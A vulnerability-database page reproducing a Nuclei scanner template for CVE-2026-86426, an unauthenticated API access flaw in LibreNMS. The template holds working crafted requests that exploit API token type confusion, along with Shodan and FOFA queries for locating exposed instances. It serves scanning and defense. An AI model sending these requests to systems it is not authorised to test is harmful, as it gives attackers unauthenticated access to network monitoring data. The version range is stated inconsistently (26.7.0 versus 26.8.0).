LibreNMS <= 26.7.0 - Unauthenticated API Access
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2026-86426 | 7 Sep 202614:07 | – | circl | |
| CVE-2026-86426 | 7 Sep 202612:53 | – | cve | |
| CVE-2026-86426 LibreNMS before 26.8.0 Authentication Bypass via API Token Type Confusion | 7 Sep 202612:53 | – | cvelist | |
| EUVD-2026-72384 | 7 Sep 202612:53 | – | euvd | |
| CVE-2026-86426 | 7 Sep 202613:20 | – | nvd | |
| PT-2026-86792 | 7 Sep 202600:00 | – | ptsecurity | |
| CVE-2026-86426 LibreNMS before 26.8.0 Authentication Bypass via API Token Type Confusion | 7 Sep 202612:53 | – | vulnrichment |
id: CVE-2026-86426
info:
name: LibreNMS <= 26.7.0 - Unauthenticated API Access
author: 0x_Akoko
severity: critical
description: |
LibreNMS <= 26.8.0 contains an authentication bypass caused by MySQL type coercion in the REST API token validation, letting unauthenticated attackers access protected endpoints and execute remote code via alert templates.
impact: |
Unauthenticated attackers can access protected API endpoints and execute remote code, leading to full system compromise.
remediation: |
Update to version 26.8.0 or later.
reference:
- https://github.com/librenms/librenms/security/advisories/GHSA-cvq8-gqfq-3mvg
classification:
cvss-score: 9.2
cwe-id: CWE-287
metadata:
verified: true
max-request: 11
vendor: librenms
product: librenms
shodan-query: http.title:"LibreNMS"
fofa-query: title="LibreNMS"
tags: librenms,auth-bypass,type-confusion,api,unauth
flow: |
if (http(1)) {
var guesses = [[0], 1, 2, 3, 4, 5, 6, 7, 8, 9];
for (var i = 0; i < guesses.length; i++) {
set("guess", JSON.stringify(guesses[i]));
if (http(2)) break;
}
}
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(tolower(body), "librenms")'
condition: and
internal: true
- raw:
- |
GET /api/v0/devices HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"api_token":{{guess}}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "json")'
- 'contains_all(body, "\"status\"", "\"ok\"", "\"devices\"")'
condition: and
# digest: 4a0a00473045022029c1fd64a3c709c8f706a0055b32bdb0ce8e61e4b09bb8debfb7d8edeac0a25e022100e84ed6a48b9c364ac97bc1406d038d005b496afa275bc3a69b24ef8108ec2176:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Sep 2026 14:36Current
CVSS 49.2
EPSS0.01405
SSVC